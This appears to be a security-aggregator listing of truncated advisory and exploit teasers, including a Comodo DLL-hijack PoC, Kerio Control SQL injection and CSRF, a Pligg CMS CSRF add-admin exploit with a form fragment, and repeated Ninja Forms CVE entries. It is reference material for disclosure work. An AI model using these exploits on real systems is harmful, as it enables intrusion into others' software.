Dating Pro Genie 2015.7 Cross Site Request Forgery

Advisory ID: HTB23294 Product: Dating Pro Vendor: DatingPro Vulnerable Versions: Genie 2015.7 and probably prior Tested Version: Genie 2015.7 Advisory Publication: February 10, 2016 without technical details Vendor Notification: February 10, 2016 Vendor Patch: February 29, 2016 Public Disclosure:...

Comodo Anti-Virus - SHFolder.dll Local Privilege Elevation Exploit

Exploit for windows platform in category local exploits SHFolder.DLL Local Privilege Elevation Exploit for Comodo Anti-Virus GeekBuddy Component by @LaughingMantis Greg Linares Since it took 146 days to fix a DLL Hijack issue I decided to drop this PoC: Technical Geeky Stuff GeekBuddy stores...

Audit CouchDB - The Simple, Clear, CouchDB Security Assessment

Audit CouchDB is a simple tool with a powerful message. Given an Apache CouchDB URL, it will tell you everything you ever wanted to know about its security. Objective Audit CouchDB will perform the following actions: 1. Learn every possible fact about the couch, for example: What is the server...

SeaWell Networks Spectrum - Multiple Vulnerabilities

Exploit for php platform in category web applications Exploit Title: SeaWell Networks Spectrum - Multiple Vulnerabilities Discovered by: Karn Ganeshen Vendor Homepage: http://www.seawellnetworks.com/spectrum/ Versions Reported: Spectrum SDC 02.05.00, Build 02.05.00.0016 CVE-ID: CVE-2015-8282...

LG Nortel Disclosure / Insecure Configuration / DoS

Title: LG Nortel ADSL modems - Multiple vulnerabilities Discovered by: Karn Ganeshen Vendor Homepage: NA Version Reported: Board ID: DV2020+Product Version: S1.064B2.3H0-0 + Software Version: 3.04L.02V.sip.LE9500.dspApp3341A2pB022f.d19e Timelines April, 2015: Vulnerabilities found April 2015:...

SearchBlox File Exfiltration Denial of Service Vulnerability

SearchBlox is a set of open source and free based on Lucene full-text search engine toolkit to build enterprise search and analytics solutions. A security vulnerability exists in SearchBlox that allows remote attackers to exploit the vulnerability to overwrite configuration files, add or remove...

Duplicate App Icons on Receiver for Windows

This article is intended for Citrix administrators and technical teams only. Non-admin users must contact their company’s Help Desk/IT support team and can refer to CTX297149 for more information. Affected users see multiple stores configured CCA4-UK, CCA4-UK1, CCA4-UK2 and so on. Receiver was...

WordPress wp-championship plugin SQL injection vulnerability

WordPress is a blogging platform developed by the WordPress Software Foundation using the PHP language, which supports setting up personal blog sites on servers with PHP and MySQL. wp-championship is one of the plugins used to play guessing games. A SQL injection vulnerability exists in the...

Kerio Control 8.6.1 - Multiple Vulnerabilities

Exploit for php platform in category web applications Title: Multiple Vulnerabilities in Kerio Control Virtual Appliance Vulnerabilities: SQL Injection, Remote Code Execution through CSRF Product: Kerio Control Homepage: http://www.kerio.com Affected Version: = 8.6.1 Fixed Version: 8.6.2 partiall...

Pligg CMS 'admin/admin_users.php' Cross-Site Request Forgery Vulnerability

Pligg CMS is an open source content management system CMS from Pligg. A cross-site request forgery vulnerability exists in Pligg CMS version 2.0.2. A remote attacker can exploit this vulnerability by sending a request to the admin/adminusers.php script to add an administrator...

Pligg CMS 2.0.2 - CSRF Add Admin Exploit

Exploit for php platform in category web applications Admin input name="password" type="text" class="form-control" id="password" value="hack...

ISPConfig '/admin/users_edit.php' cross-site request forgery vulnerability

ISPConfig is a set of Linux-based open source hosting control panel, it can be used through the Web control panel to manage multiple servers, open a Web site, monitor server operating conditions and so on. ISPConfig suffers from a cross-site request forgery vulnerability that allows remote...

Code injection

Unspecified vulnerability in the Ninja Forms plugin before 2.8.10 for WordPress has unknown impact and remote attack vectors related to admin users...

CVE-2014-9688

Unspecified vulnerability in the Ninja Forms plugin before 2.8.10 for WordPress has unknown impact and remote attack vectors related to admin users...

CVE-2014-9688

CVE-2014-9688 concerns the Ninja Forms WordPress plugin, specifically versions before 2.8.10. The connected sources describe an unspecified vulnerability with unknown impact and remote attack vectors related to admin users. The NVD metrics indicate partial confidentiality, integrity, and availabi...

CVE-2014-9688

Unspecified vulnerability in the Ninja Forms plugin before 2.8.10 for WordPress has unknown impact and remote attack vectors related to admin users...

WordPress Ninja Forms Plugin <= 2.8.9 - Unspecified Vulnerability

Because of this vulnerability in Ninja Forms plugin, remote attack vectors are related to admin users. Solution Update the plugin...

Ninja Forms <= 2.8.9 - Unspecified Issue Affecting Admin Users

This version includes a fix for a potential security vulnerability for admin users...

1830 Photonic Service Switch PSS-32/16/4 Cross Site Scripting

SWISSCOM CSIRT ADVISORY - http://www.swisscom.com/security CVE ID: CVE-2014-3809 Product: 1830 Photonic Service Switch PSS-32/16/4 Vendor: Alcatel-Lucent Subject: Reflected Cross-site Scripting - XSS Effect: Remotely exploitable Author: Stephan Rickauer stephan.rickauer at swisscom.com Date:...

openstack-keystone: configuration data information leak through Keystone catalog

A flaw was found in the keystone catalog URL replacement. A user with permissions to register an endpoint could use this flaw to leak configuration data, including the master admintoken. Only keystone setups that allow non-cloud-admin users to create endpoints were affected by this issue...